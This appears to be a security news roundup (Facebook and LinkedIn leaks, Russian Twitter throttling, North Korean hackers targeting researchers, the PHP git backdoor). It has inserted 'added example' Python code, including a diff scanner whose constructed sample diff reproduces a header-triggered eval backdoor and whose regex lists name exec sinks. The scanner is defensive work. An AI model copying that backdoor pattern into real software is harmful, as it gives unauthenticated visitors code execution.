Security News This Week: Oh Look, LinkedIn Also Has a 500M User Data Leak

WIRED

A week into the revelation that Facebook leaked the data of 500 million users—including phone numbers and other potentially sensitive info—and the company still hasn’t given a full account of what happened. But we’ve managed to figure out both that the root of the problem was Facebook’s “contact import” feature, and that Facebook had plenty of opportunities to fix that issue before it resulted in attackers scraping half a billion people’s data.

On Thursday, federal agents arrested a 28-year-old Texas man for allegedly plotting to blow up an Amazon data center in Virginia. According to court documents, he had made alarming posts on the forums at MyMilitia.com, which someone then reported to the FBI. While it’s a concerning incident, domestic terror experts say there are no signs that Big Tech is a more pronounced target than in years past despite the heightened rhetoric from the far-right around supposed censorship.

Encrypted messaging app Signal announced this week that it would begin integrating the relatively new cryptocurrency MobileCoin. While a payments feature helps Signal keep up with its more full-featured competitors, the move raised questions as to whether Signal was inviting regulator interest and overly complicating a product lauded for its simplicity and ease of use.

Full article

Russia’s Twitter throttling may give censors never-before-seen capabilities

Ars Technica

Russia has implemented a novel censorship method in an ongoing effort to silence Twitter. Instead of outright blocking the social media site, the country is using previously unseen techniques to slow traffic to a crawl and make the site all but unusable for people inside the country.

Research published Tuesday says that the throttling slows traffic traveling between Twitter and Russia-based end users to a paltry 128kbps. Whereas past Internet censorship techniques used by Russia and other nation-states have relied on outright blocking, slowing traffic passing to and from a widely used Internet service is a relatively new technique that provides benefits for the censoring party.

Full article

553,000,000 Reasons Not to Let Facebook Make Decisions About Your Privacy

Electronic Frontier Foundation

Another day, another horrific Facebook privacy scandal. We know what comes next: Facebook will argue that losing a lot of our data means bad third-party actors are the real problem, and that we should trust Facebook to make more decisions about our data to protect against them. If history is any indication, that’ll work. But if we finally wise up, we’ll respond to this latest crisis with serious action: passing America’s long-overdue federal privacy law (with a private right of action) and forcing interoperability on Facebook so that its user/hostages can escape its walled garden.

In January 2021, Motherboard reported on a bot that was selling records from a 500 million-plus person trove of Facebook data, offering phone numbers and other personal information. Facebook said the data had been scraped by using a bug that was available as early as 2016, and which the company claimed to have patched in 2019. Last week, a dataset containing 553 million Facebook users’ data—including phone numbers, full names, locations, email addresses, and biographical information—was published for free online. (It appears this is the same dataset Motherboard reported on in January). More than half a billion current and former Facebook users are now at high risk of various kinds of fraud.

Full article

Technology could make fighting COVID less restrictive but privacy will take a hit

ZDNet

Two of the nations held up as exemplars of how to fight COVID were Taiwan and New Zealand, but the approaches were very different: one has locked down parts of its population multiple times, and the other, with more experience of respiratory viruses, has avoided such approaches.

A recent academic paper published in the Journal of the Royal Society of New Zealand examined the two nations and raised a number of questions that deserve to be considered in light of a year of lockdowns, contact tracing, outbreaks, and other restrictions on the movement of people.

The central push of the paper is that as New Zealand has kept individual privacy as a paramount concern, this has led directly to the use of city or nationwide lockdowns, which it has labelled as a blunt instrument.

Full article

Hackers Set Up a Fake Cybersecurity Firm to Target Security Experts

The Hacker News

A North Korean government-backed campaign targeting cybersecurity researchers with malware has re-emerged with new tactics in their arsenal as part of a fresh social engineering attack.

In an update shared on Wednesday, Google’s Threat Analysis Group said the attackers behind the operation set up a fake security company called SecuriElite and a slew of social media accounts across Twitter and LinkedIn in an attempt to trick unsuspecting researchers into visiting the company’s booby-trapped website where a browser exploit was waiting to be triggered.

Full article

How to check if your info was exposed in the Facebook data leak

Bleeping Computer

Data breach notification service Have I Been Pwned can now be used to check if your personal information was exposed in yesterday’s Facebook data leak that contains the phone numbers and information for over 500 million users.

Yesterday, a threat actor released the personal information for 533,313,128 Facebook users on a hacking forum, including mobile numbers, name, gender, location, relationship status, occupation, date of birth, and email addresses.

This data was originally sold in private sales after being collected in 2019 using a bug in the ‘Add Friend’ feature on Facebook. Facebook had closed this vulnerability soon after it was discovered, but threat actors continued to circulate the data until it was finally released practically for free ($2.19) yesterday.

Since then, Troy Hunt has added the leaked data to his Have I Been Pwned data breach notification service to help users determine if a Facebook member’s data was exposed in the leak.
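The lookup described above, written out as an added example (not code from Bleeping Computer or from Have I Been Pwned). It normalises an e-mail address or phone number, builds the request to HIBP's v3 "breachedaccount" endpoint (which needs an API key in the hibp-api-key header and a descriptive user-agent, and answers 404 when the account is in no breach), and reads the breach names out of the reply. The API key, the header name HTTP_X_EXAMPLE-style values and the sample responses are constructed; the exact phone-number format HIBP accepts is an assumption to check against its documentation, and the breach name "Facebook" is assumed to be how HIBP labels this dataset.

```python
"""Check a phone number or e-mail address against Have I Been Pwned (HIBP).

Added example, not code from Bleeping Computer or HIBP. The network call is
kept separate from the request-building and response-parsing functions so
those can run offline against the constructed sample responses below.
"""
import json
import re
import urllib.error
import urllib.request
from typing import Dict, List, Tuple
from urllib.parse import quote

HIBP_API = "https://haveibeenpwned.com/api/v3/breachedaccount/"
FACEBOOK_BREACH_NAME = "Facebook"  # assumption: HIBP's "Name" for this leak


def normalise_account(account: str) -> str:
    """Lowercase an e-mail address, or reduce a phone number to '+' plus
    digits (international format; the exact form HIBP accepts is an
    assumption here, check its documentation)."""
    account = account.strip()
    if "@" in account:
        return account.lower()
    digits = re.sub(r"\D", "", account)
    if not digits:
        raise ValueError("not an e-mail address or phone number")
    return "+" + digits


def build_request(account: str, api_key: str) -> Tuple[str, Dict[str, str]]:
    """URL and headers for a HIBP v3 breachedaccount query."""
    url = HIBP_API + quote(normalise_account(account), safe="+@")
    headers = {"hibp-api-key": api_key, "user-agent": "leak-check-example"}
    return url, headers


def breaches_from_response(status: int, body: str) -> List[str]:
    """HIBP answers 404 when the account appears in no breach and 200 with a
    JSON array of breach objects otherwise; return the breach names."""
    if status == 404:
        return []
    if status != 200:  # 401 (bad key) and 429 (rate limited) land here
        raise RuntimeError(f"unexpected HIBP status {status}")
    return [entry["Name"] for entry in json.loads(body)]


def in_facebook_leak(status: int, body: str) -> bool:
    return FACEBOOK_BREACH_NAME in breaches_from_response(status, body)


def query_hibp(account: str, api_key: str) -> bool:
    """Live lookup; needs network access and a real key, so it is not
    exercised by the offline samples."""
    url, headers = build_request(account, api_key)
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req) as resp:
            return in_facebook_leak(resp.status, resp.read().decode())
    except urllib.error.HTTPError as err:
        return in_facebook_leak(err.code, "")


# Constructed sample responses; not real HIBP output for any real account.
SAMPLE_HIT = (200, json.dumps([{"Name": "Facebook"}, {"Name": "LinkedIn"}]))
SAMPLE_MISS = (404, "")

if __name__ == "__main__":
    # "<your-hibp-key>" is a placeholder, not a real key.
    url, headers = build_request("+1 (415) 555-2671", api_key="<your-hibp-key>")
    print("would GET", url, "with headers", sorted(headers))
    print("sample hit  ->", in_facebook_leak(*SAMPLE_HIT))
    print("sample miss ->", in_facebook_leak(*SAMPLE_MISS))
```

A 404 from this endpoint is the normal "not found" answer rather than an error, so the live path feeds the HTTPError code back through the same parser; anything other than 200 or 404 is surfaced rather than silently treated as "not in the leak".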

Full article

Google: North Korean hackers target security researchers again

Bleeping Computer

Google’s Threat Analysis Group (TAG) says that North Korean government-sponsored hackers are once again targeting security researchers using fake Twitter and LinkedIn social media accounts.

The hackers also created a website for a fake company named SecuriElite, supposedly located in Turkey and offering offensive security services, which Google’s team that hunts state-backed hackers discovered on March 17.

All LinkedIn and Twitter accounts created by the North Korean hackers and associated with this new campaign were reported by Google and are now disabled.

Just as in the attacks detected in January 2021, the site also hosted the attackers’ PGP public key as bait: opening the page triggered a browser exploit that infected security researchers with malware.

Full article

Step up your privacy game with encrypted email (not just for techies)

Mullvad

As a kid, did you also assign each letter of the alphabet to another and write secret messages to your friends, perhaps even invisibly with lemon juice?

A Caesar or Atbash cipher is a great start, but it isn’t very secure online. Making the leap to communicating with encrypted emails isn’t very difficult, and it’s a great way to improve your online privacy game.
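To show what "isn't very secure" means for the two ciphers named above, here is an added example (not from Mullvad's post): both ciphers implemented, and a Caesar ciphertext recovered without the key by trying every one of the 25 possible shifts and picking the candidate whose letter frequencies look most like English. Atbash has no key at all, so applying it a second time is the break. The sample message and the frequency table are constructed for the example.

```python
"""Why a Caesar or Atbash cipher does not protect a message online.

Added example, not code from Mullvad. Caesar's whole key space is 25 shifts
and a simple substitution leaves the letter frequencies of the plaintext
intact, so the key is recovered from the ciphertext alone.
"""
import string
from typing import Tuple

ALPHABET = string.ascii_uppercase

# Approximate relative frequency (per cent) of letters in English text.
ENGLISH_FREQ = {
    "E": 12.7, "T": 9.1, "A": 8.2, "O": 7.5, "I": 7.0, "N": 6.7, "S": 6.3,
    "H": 6.1, "R": 6.0, "D": 4.3, "L": 4.0, "C": 2.8, "U": 2.8, "M": 2.4,
    "W": 2.4, "F": 2.2, "G": 2.0, "Y": 2.0, "P": 1.9, "B": 1.5, "V": 1.0,
    "K": 0.8, "J": 0.15, "X": 0.15, "Q": 0.10, "Z": 0.07,
}


def caesar(text: str, shift: int) -> str:
    """Shift every letter by `shift` positions (negative undoes); other
    characters pass through unchanged."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def atbash(text: str) -> str:
    """Map A<->Z, B<->Y, ...; the mapping is its own inverse, so there is no
    key to keep secret."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr(25 - (ord(ch) - base) + base))
        else:
            out.append(ch)
    return "".join(out)


def english_score(text: str) -> float:
    """Chi-squared distance between the letter distribution of `text` and the
    English reference; lower means more English-like."""
    letters = [ch for ch in text.upper() if ch in ALPHABET]
    if not letters:
        return float("inf")
    n = len(letters)
    score = 0.0
    for letter in ALPHABET:
        expected = ENGLISH_FREQ[letter] / 100 * n
        observed = letters.count(letter)
        score += (observed - expected) ** 2 / expected
    return score


def break_caesar(ciphertext: str) -> Tuple[int, str]:
    """Try all 25 shifts and return (shift, plaintext) for the candidate
    that scores most English-like; no key is needed."""
    best = min(range(1, 26), key=lambda s: english_score(caesar(ciphertext, -s)))
    return best, caesar(ciphertext, -best)


# Constructed sample "secret" for the demonstration.
SAMPLE_PLAINTEXT = ("Meet me behind the gym after school and bring the lemon ink "
                    "so we can read the hidden message")

if __name__ == "__main__":
    ct = caesar(SAMPLE_PLAINTEXT, 7)
    print("ciphertext:", ct)
    print("recovered: ", break_caesar(ct))
    print("atbash twice restores plaintext:", atbash(atbash(SAMPLE_PLAINTEXT)) == SAMPLE_PLAINTEXT)
```

The frequency attack needs only a few dozen letters of ciphertext; a real message encrypted with PGP or S/MIME gives an observer nothing comparable to work with, which is the gap the post is pointing at.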

Full article

Hackers backdoor PHP source code after breaching internal git server

Ars Technica

A hacker compromised the server used to distribute the PHP programming language and added a backdoor to source code that would have made websites vulnerable to complete takeover, members of the open source project said.

Two updates pushed to the PHP Git server over the weekend added a line that, if run by a PHP-powered website, would have allowed visitors with no authorization to execute code of their choice. The two malicious commits gave code-injection capability to any visitor who had the word “zerodium” in an HTTP header.
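One check a reviewer could run over commits like these, as an added example that is neither the PHP project's code nor Ars Technica's: walk a unified diff and report every added line that calls a code-execution sink, noting when request-derived data or a hard-coded trigger string (the page describes a header containing "zerodium") sits in the nearby added lines. The sink, source and trigger lists are this example's own choices, the proximity window is a heuristic, and both diffs below are constructed samples (the file name, header name and code are invented) rather than the real PHP commits.

```python
"""Flag code-execution sinks added by a commit, the pattern behind the PHP backdoor.

Added example, not code from the PHP project. Heuristic review gate: report
added lines that call an eval-style sink, and note whether request-derived
data or a hard-coded trigger string appears in the surrounding added lines.
"""
import re
from dataclasses import dataclass, field
from typing import List

HUNK_RE = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")
SINK_RE = re.compile(r"\b(zend_eval_stringl?|eval|system|popen|exec|passthru|shell_exec)\s*\(")
SOURCE_RE = re.compile(r"HTTP_[A-Z0-9_]+|TRACK_VARS_SERVER|\b_(?:SERVER|GET|POST|REQUEST|COOKIE)\b|\bgetenv\s*\(")
TRIGGER_RE = re.compile(r"\b(?:strstr|strcmp|strncmp|strcasecmp|memcmp)\s*\([^;]*\"[^\"]+\"")
WINDOW = 6  # number of most recent added lines examined around a sink (heuristic)


@dataclass
class Finding:
    file: str
    line: int  # line number in the new version of the file
    sink: str
    reasons: List[str] = field(default_factory=list)


def scan_diff(diff_text: str) -> List[Finding]:
    """Report sink calls on added lines of a unified diff."""
    findings: List[Finding] = []
    current_file = "<unknown>"
    new_line = 0
    recent_added: List[str] = []  # added lines of the current hunk, in order
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):
            current_file = raw[4:].strip()
            if current_file.startswith("b/"):
                current_file = current_file[2:]
            continue
        if raw.startswith("--- ") or raw.startswith("\\"):
            continue  # old-file header / "No newline at end of file"
        m = HUNK_RE.match(raw)
        if m:
            new_line = int(m.group(1))
            recent_added = []
            continue
        if raw.startswith("-"):
            continue  # removed line: occupies no line in the new file
        if raw.startswith("+"):
            text = raw[1:]
            recent_added.append(text)
            sink = SINK_RE.search(text)
            if sink:
                window = recent_added[-WINDOW:]
                reasons = []
                if any(SOURCE_RE.search(t) for t in window):
                    reasons.append("request-derived data in reach")
                if any(TRIGGER_RE.search(t) for t in window):
                    reasons.append("hard-coded trigger string")
                findings.append(Finding(current_file, new_line, sink.group(1), reasons))
        new_line += 1  # added and context lines both advance the new file
    return findings


# Constructed sample modelled on the page's description (a header value
# containing a trigger word reaching an eval); not the real PHP commit.
SAMPLE_BACKDOOR_DIFF = """\
--- a/ext/example/handler.c
+++ b/ext/example/handler.c
@@ -40,6 +40,12 @@ static void handle_request(void)
     if (!enabled) {
         return;
     }
+    /* tidy up header handling */
+    zval *hdr = zend_hash_str_find(Z_ARRVAL(PG(http_globals)[TRACK_VARS_SERVER]),
+                                   "HTTP_X_EXAMPLE", sizeof("HTTP_X_EXAMPLE") - 1);
+    if (hdr && strstr(Z_STRVAL_P(hdr), "zerodium")) {
+        zend_eval_string(Z_STRVAL_P(hdr), NULL, "example");
+    }
     process(enabled);
     return;
 }
"""

# Constructed benign change to the same file.
SAMPLE_BENIGN_DIFF = """\
--- a/ext/example/handler.c
+++ b/ext/example/handler.c
@@ -40,6 +40,7 @@ static void handle_request(void)
     if (!enabled) {
         return;
     }
+    php_error_docref(NULL, E_NOTICE, "handler enabled");
     process(enabled);
     return;
 }
"""

if __name__ == "__main__":
    for name, diff in (("backdoor", SAMPLE_BACKDOOR_DIFF), ("benign", SAMPLE_BENIGN_DIFF)):
        print(name, "->", scan_diff(diff) or "no sinks added")
```

A hit with both reasons attached is the shape of a backdoor rather than a bug: a gate on a magic string is something no legitimate feature needs, and an eval fed from a request header is something no PHP extension needs. The scan is a review aid, not a proof of absence; the lasting fix for this incident class is enforcing signed commits and reviewed pushes on the repository itself.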

Full article